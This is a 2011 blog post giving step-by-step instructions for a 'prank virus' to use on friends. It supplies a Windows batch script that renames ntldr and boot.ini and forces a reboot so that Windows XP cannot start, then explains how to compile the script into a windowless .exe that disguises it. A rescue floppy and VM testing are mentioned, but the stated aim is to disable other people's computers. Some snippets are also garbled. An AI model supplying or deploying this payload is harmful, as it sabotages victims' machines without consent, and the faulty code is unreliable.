Creating a fake “harmless” Virus !

Posted: July 2, 2011 in Uncategorized

Hello guys !

Today i was having a conversation with a friend of mine and i got to know about a trick to trick our friends and i thought of sharing it online . So here it is –

1) Create a boot disk containing Boot Files.

2) Open Notepad and Copy the Following Codes:

@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05

3. Save the File with a *.bat extension
4. Download a bat2exe software to convert the file to .exe
5. The Virus Renames

the ntldr file to dxcore69ldr disabling OSs to load.
6. Test the Virus in a computer or using Virtual PC software like VMWare or the free Virtual Box.

Full Detail Procedure:

To start from the basics, Operating Systems of the type like Windows XP require these three vital boot files to start:

1. boot.ini
2. ntldr

Mentioned files are usually located at the C: Drive and if these are missing or renamed, the dependent Operating Systems won’t be able to boot or start.

So by taking this as an advantage the main target of the virus is to rename one of the file so that the Operating Systems (Usually the mostly used Windows XP) won’t be able to boot.

But safety is always first, thus we will create a Floppy boot disk to get rescued from the virus infection. And this instruction is found all over the Information Superhighway and all the IT Magazines had at least once published the Rescue Disk instructions in an article. Anyways, the steps are:

1. Go to Control Panel and then open Folder Options
2. Click on the View tab
3. Click on “Show Hidden Files and Folders”, uncheck the “Hide Extensions for known file types” and “Hide protected operating system files” and then click “OK” and “Yes”.
4. Now format a Floppy Disk even if it’s empty and don’t attempt to copy anything now.
5. Now copy the three visible boot files (boot.ini, NTDETECT.COM and ntldr) from the C drive directly to the Floppy Disk.

Now, if you select the Floppy Drive to boot first in bios while the Rescue Floppy disk is inserted, your operating system will boot even though the boot files in C: drive are missing.

Let’s make the virus now by renaming only the ntldr file. Go to Start>Programs>Accessories>Notepad or Start>Run>notepad.exe and copy and paste the following lines:

@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05

Now go to File>Save and Type “dxcore69.bat” and the file will be saved with a .bat extension.

You can now Double Click on the dxcore69.bat file you have created and the ntldr file should be renamed to dxcore69ldr disabling the OSs to boot and a reboot will occur after five seconds. And the work of the virus is completed.

In addition you may want to create an uneditable virus looking file by converting the .bat file to a noticeable .exe file. Well, the bat2exe software of the Package given at the end is just excellent for doing that. Browse and select the dxcore69.bat, select an icon if you want and check the Ghost Application option as it will show no window after lunch.

Now let’s learn what is going on:

Line # 1: @echo off
Not that necessary if converted to exe with Ghost Application option but its work is not to show any lines in the black window.

Line # 2: ATTRIB -h -r -s c:\ntldr
The ntldr file is a Read Only, Hidden and a System File. This command in just to disable this attributes. -h makes a file hidden but +h will turn it into a hidden file. And similarly “r” is for Read Only and “s” is for System file Attribute. Its necessary to do the renaming thingy.

Line # 3: REN c:\ntldr dxcore69ldr
REN stands for RENAME, in this command ntldr file of C: Drive gets renamed to dxcore69ldr

Line # 4: shutdown.exe -r -f -t 05
This Command Restarts the computer with a timeout of 5 seconds and forces all the applications to close. Now the supporting commands are:
-r = Restart
-f = Forces Applications to close
-t = Timeout
05 = Timeout Value XX

Line 5: EXIT
It just exits the program

Now that you have learnt some basics you can also rename the renaming two files and to do that type these lines between the @echo and the Shutdown line:

ATTRIB -h -r -s c:\boot.ini
REN c:\ntldr dxcore69.ini

REN c:\ntldr

So the new overall virus is:

@echo off

ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr

ATTRIB -h -r -s c:\boot.ini
REN c:\boot.ini dxcore69.ini


shutdown.exe -r -f -t 05

It is natural for us to feel the fear of not to test a virus in your PC, but no problem, you can try it on a Virtual OS software like VMWare or the free Virtualbox. It’s a kind of software for example gives you the ability to install and run Windows Vista in a Window of Windows XP in a virtual Hardisk.

Well guys give your views :-


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s